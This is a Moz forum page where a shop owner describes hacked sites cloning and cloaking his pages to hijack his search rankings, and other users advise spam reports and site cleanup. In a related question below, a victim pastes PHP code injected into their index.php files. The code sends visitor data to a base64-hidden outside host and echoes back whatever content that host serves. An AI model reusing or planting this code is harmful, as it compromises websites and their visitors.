SEO results hacked?
-
Hi there,
Since last Saturday I noticed a big traffic drop on at least the following two pages:
http://www.smartphonehoesjes.nl/apple/ and http://www.smartphonehoesjes.nl/apple/iphone-6/.I did some research and I noticed something realy strange. Unknown sites seems to hijacked my organic results by using the exact same page title and META description but leading traffic to another their domain. Look at those pictures: http://imgur.com/v6kglLU and http://imgur.com/Whx4l8K.
Edit: a competitor seems to have a same problem: http://imgur.com/Zzhter4. I just fetched both URL's in GWT as Google. In Bing there is a little sign of this problem too, so this is not a Google only thing.
Can anybody please help me here? This has cost me some real money since Saturday.
Tnx in advance.
Marcel
-
Hi Dirk,
After contacting Google by phone and mail, filing a few more spam reports and refreshing textual content, we got our results back and traffic/revenue has grown since. We are very happy, and no other pages got attacked (yet).
Thanks for your help.
Marcel
-
Marcel,
When you contact the site owners - a good guideline on 'how to clean' can be found here: https://codex.wordpress.org/FAQ_My_site_was_hacked (specifically for Wordpress) - more in general: http://www.google.com/webmasters/hacked/ - it could be that the hackers gained access by a security issue with the slider (http://wptavern.com/critical-security-vulnerability-found-in-wordpress-slider-revolution-plugin-immediate-update-advised) so they should certainly check that Wordpress & it's plugins are up-to-date.
Good luck!
Dirk
-
Hi Dirk,
Let's hope the hacker only copied a few pages and not the entire site. What could a site like soft-solutions possibly do to clean their site? I think it's worth a chance to ask planchemag and wearemash to do the same. My new URL shows up if you search for 'iphone 6 / 6s hoesje', that's something positive. I filed a request for deletion of the old and hacked URL of the iPhone 6 page, hopefully Google throws it out and picks up the new and clean one like it does with the other search query.
I can do nothing but wait now I guess. I will keep you updated here.
Marcel
-
Hi Marcel,
I have the impression that soft-solutions.nl already discovered that they have been hacked & have cleaned their site in the mean time.
It's possible that the hacker only copied 1/2 pages - it's however more likely that they copied the full site but that the other pages haven't been indexed yet. Idem for copyscape - if the hack only occurred recently, these tools (and Google) haven't been able to pickup all pages yet.
When I search for 'iphone 6 hoesje' I get the planchemag.com site. As all these pages are duplicates, it's Google who's deciding which page it's going to show. Google decided that in some cases the hacked version is the preferred one, for other queries people will still get to your site. It probably depends on the anchors the hackers used to the hacked site. The volume of iphone 6 is probably higher than iphone 5 queries, so they will probably have used anchors containing 'iphone 6' to point to the site.
Dirk
-
Hi Dirk,
That second result is our homepage, I see that this one got indexed at the exact same time our own homepage got indexed. However, Google shows our (the good one!) homepage in the search results.
That's quite ironical indeed, the webdesign company.
The other result redirects to planchemag.com, which only gives one result on a site:www.planchemag.com/. What about this one?
Is it possible this hack only limits to those two pages?I used the tool copyscape.com and it seem to be only the following pages that are affected:
What about this one: search for site:soft-solutions.nl and you'll find our iPhone 5/5s pagina. Search for 'iPhone 5 hoesje' and Google shows our correct page as a result. How is this possible?
Marcel
-
Hi Marcel,
If I do a site:www.wearemash.com there seem to be only 2 pages from your site indexed at the moment - possible that the other ones haven't been picked-up by Google yet. Quite ironical that the domain wearemash.com belongs to a web design company.
rgds,
Dirk
-
Hi Dirk,
I just set the redirect, just to be sure. This is a realy bad thing, people can abuse Google to negatively impact a whole company and lots of individuals. That should not be possible, hope Google will fix this soon!
You assume the whole site will go down in Google and not only those two pages? This will be terrible.
Marcel
-
Hi Marcel,
Don't think that it will change a lot. If the hack is done in the same way as the other cases (which seems to be the case), they copied your entire site into the site which has been hacked. They present this version to Google (cloaking - as you can see in the cached version) - but "normal" visitors are redirected to a different e-commerce site. To make sure the hacked site is positioned well, they point hundreds of links from other hacked sites to the cloned version of your site. So whatever you change on your site, will not impact the cloned version, which will keep it's position, until Google takes action.
It's a quite a simple trick, and to be very honest, I am surprised that Google is not capable to detect it.
rgds,
Dirk
-
Hi Dirk,
This should be a Google task to prevent her customers/users from those kind of hackers right?
Do you think that redirecting my iPhone 6 page to a new URL would help? I can imagine the hackers hijacked an URL, when I pick a new one and 301 redirect the old one to the new, will my own result show up again?
I already spoke with Google this morning and they are going to look after it.
Marcel
-
Hi Marcel,
It seems to be a plague recently- there where similar cases on Moz the last two weeks: http://moz.com/community/q/chinese-site-ranking-for-our-brand-name-possible-hack (similar situation as you) - a site being hacked http://moz.com/community/q/getting-different-search-queries-in-google-webmaster. It seems the hackers are exploiting a vulnerability in the slider used on these Wordpress site.
Apart from filing spam reports there is not much more you can do. You could inform the site owners that their site has been hacked & ask them to clean it, but I fear that these hackers are capable to switch sites quite fast.
Good luck,
Dirk
-
Hi Matt-POP,
Thanks for this opening, didn't look at it this way. All our domains got replaced by wearemesh in the cached page. The VWO code looks like ours, so do you really think they were testing? All of the source code is ours, also the canonical, only the domain got replaced by theirs..
We are using VWO but we are doing it by ourself. I'm not sure VWO is the problem.
This problem occured last Saturday. What we did on Friday is make our website mobile friendly for the scheduled 21st of April mobile Google update. Is this coincidence? The two companies who helped us with this change, made some changes to the canonical tags among other things.
A strange thing here is that a competitor has a same problem, wouldn't that seem like a conscious action (hack)?
@Patrick: We don't know them, for sure. If you go to the unkknown website, you see that they don't use our meta data, so that's the strange part.
Update: the domain www.wearemesh.com now redirects to www.ovsee.com, the same website you got redirected to when you click on the hacked result of the competitor I wrote about. The visual URL there is Finan.nl. This Ovsee.com looks like the perpetrator. But I still can't get a grip on it.. the other hacked result leads to www.planchemag.com which redirects to http://planchemag.fr.
What can I do to get my results back? I already filed a spam report in GWT.
Thanks again,
Marcel -
Their Google cache results were somehow corrupted temporarily:
http://webcache.googleusercontent.com/search?q=cache:http%3A%2F%2Fwww.wearemash.com%2F
There's a VWO code in there:
So it looks like they were split testing. The canonical is set to their domain which is why they took over results temporarily on these search terms.
It looks like the split test somehow grabbed your page info & theirs and split tested it giving theirs a canonical on your content. That would do it.
Are you using VWO? Are you using these guys to do your conversion optimisation? You may have the same conversion company who made a mistake or you may have the same VWO designer. I'm not sure how it got there but looking at the code, VWO does look to probably factor into the problem.
-
Hi Marcel
Quick question - I know you said "unknown", but are you sure that this site has nothing to do with your site? Like, did they develop or design your site at all?
Here is a help section from Google on these sorts of issues - it covers everything from cloaking to content scraping, and doorway pages to other spam types.
I would try contacting the webmaster of this site and asking them to remove your titles/meta descriptions. If they do not respond, or are not willing to cooperate, reference the resource above as Google has steps to take to ensure action is taken against sites that do this sort of thing.
Hope this helps! Let me know if you have any questions or need more help, good luck!
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
3 word brand name + SEO. Will I be losing out on organic searches with spaces?
Hello, Starting a new website and the company name has three words. We've made the decision for the brand guide that we will not have spaces when the name is included in copy. Are we going to have difficulties ranking for both instances? Thanks
White Hat / Black Hat SEO | | jessicarechkemmer0 -
What sources do you use to keep on top of SEO news?
I want to try building an RSS feed of SEO news... but not wanting to find myself drowning in materials As such, looking for a short list of recommendations for keeping on top of SEO developments – the impetus is that I'm still discovering changes that happened 2, 3, even 5 years ago, and I want to try and catch these things as they happen. Thinking something actually from Google may be on the list, but some of these sources are pretty on top of things! Seroundtable.com also comes to mind. But what do you use to keep informed? Thanks 🙂
White Hat / Black Hat SEO | | ntcma1 -
Do rss feeds help seo in 2013?
I have seen answers for this back in 2012 but as we all now things have changed in 2013. My question is Do rss feeds help seo in 2013? Or does google see it as duplicate content (I see that the moz site has RSS ...)
White Hat / Black Hat SEO | | Llanero0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Black Hat? Is it really possible my new client paid someone to SEO the word "here"?
I just took on a client and first thing I saw in Webmaster Tools was the dreaded "Unnatural Link Patterns" message dated Apr 7th, 2012. MajesticSEO is reporting 212 backlinks, OSE is reporting 251. Nothing out of the ordinary, in fact they only anchor text is their brand. However, we then ran an SEO PowerSuite Crawl and found 429 backlinks with 78.1% of links use the anchor text "here" and 77.9% of all links point to the same URL. If this is indeed true I can see why they got the message from Google. The company has admitted they hired a service to do SEO for $299/mo for several months but when they saw no results they quit. Could this company really have gone after "here". It not, I can't find anything that would give them the message they got from Google Webmaster Tools.
White Hat / Black Hat SEO | | Dweber0 -
Explain To Me How Negative SEO ISNT Real?
I'm seeing lots of "offers" springing up to do negative SEO on your competitors. I know people keep insisting this sort of thing is just a bogeyman, but follow my logic here: We know the Penguin update PENALIZED, and not just devalued "over optimization." Read: exact match keyword links. We know that if your link profile is too "unnaturally" keyword heavy, (it should be majority your brand or your domain or your company name, etc) you get penalized. Again, not devalued, PENALIZED. Ok. So what is to stop a blackhatter from using one of those software bots to just kill a competitor? Knowing the above two points, lets say a website is ranking for "cool widgets". Why not just create a bunch of exact match keyword spam links for "cool widgets" targeting that website. In a while, the Penguin penalty kicks in and bammo. The thing that scares me about the post Penguin landscape is that google has specifically named an activity ("over optimization") that will get you PENALIZED. So, don't do that, right? Except, that means they've explicitly outlined an activity that will be penalized, and is easy for others to do to you, and that you would be powerless to prevent. I await the usual "this is an age old worry that has never come true" replies. But if you reply that way, ask yourself, can you refute the logic of the points above? And also... oh no... It's happening. I'm seeing it.
White Hat / Black Hat SEO | | brianmcc1 -
Here's some more proof white hat SEO works
I guess this is the most logical place to share this with you. I do SEO for many sites. I've recently been focusing on two in particular for the same client. We used Netfirms SEO services to get links--he insisted--which basically consists of writing articles in broken English and placing them all over blog networks with our desired anchor text. On the other site, I simply refused to employ those services. This was the client's main site, and was way too important to mess around with. I built links myself, the legit way. Long story short, for months I watched the shady, black hat site climb and climb in the SERPs, while the white hat one kept falling. This morning, I checked my SEOmoz campaigns and my white hat site went from #8 to #2 and my black hat site went from page 2 to no longer being in the top 50. Just another example of what's been happening with Google lately and how great it is. Interestingly, the black hat site never got a warning in GWT about buying links. Now I just have to figure out a way to break the news to my boss and tell him I told him so without actually using those words.
White Hat / Black Hat SEO | | UnderRugSwept5 -
Is this SEO correct?
Please view website http://www.staddonsbeds.co.uk. In the footer is the keywords the client is aiming for. These pages have been created separately to the sitemap. Is this tactic and pages white hat seo or is this considered black hat seo such as gateway pages? Could you please confirm Thanks Paul
White Hat / Black Hat SEO | | paulbaguley0